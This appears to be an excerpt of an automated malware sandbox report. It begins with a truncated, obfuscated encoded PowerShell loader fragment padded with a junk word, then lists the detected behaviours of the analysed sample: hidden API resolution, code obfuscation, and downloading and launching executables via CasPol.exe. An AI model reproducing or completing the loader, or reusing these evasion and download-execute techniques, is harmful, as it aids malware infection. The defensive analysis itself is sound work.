NyssaUgBUNyssaD4NyssaPgNyssanNyssaDsNyssaJNyssaBoNyssaGUNyssacgBiNyssaGkNyssadgBvNyssaHINyssaaQB0NyssaHkNyssaINyssaNyssa9NyssaCNyssaNyssaJwNyssa8NyssaDwNyssaQgBBNyssaFMNyssaRQNyssa2NyssaDQNyssaXwBFNyssaE4NyssaRNyssaNyssa+NyssaD4NyssaJwNyssa7NyssaCQNyssabgBhNyssaGINyssabwBiNyssaGUNyssacgB5NyssaCNyssaNyssaPQNyssagNyssaCQNyssaYwBhNyssaHMNyssadNyssaByNyssaGUNyssabgBzNyssaGkNyssaYQBsNyssaC4NyssaSQBuNyssaGQNyssaZ Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0041D0CF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 16_2_0041D0CF
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FF7C7AE00BD pushad ; iretd 1_2_00007FF7C7AE00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF7C7AF00BD pushad ; iretd 3_2_00007FF7C7AF00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF7C64E2AF8 push eax; retf 8_2_00007FF7C64E2B01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF7C64E22B5 push eax; iretd 8_2_00007FF7C64E233D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_004570CF push ecx; ret 16_2_004570E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00435226 push ecx; ret 16_2_00435239
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0045D9ED push esi; ret 16_2_0045D9F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00457A00 push eax; ret 16_2_00457A1E
Contains functionality to download and launch executables
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_004062E2 ShellExecuteW,URLDownloadToFileW, 16_2_004062E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 16_2_0041AC43
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0041D0CF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 16_2_0041D0CF
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
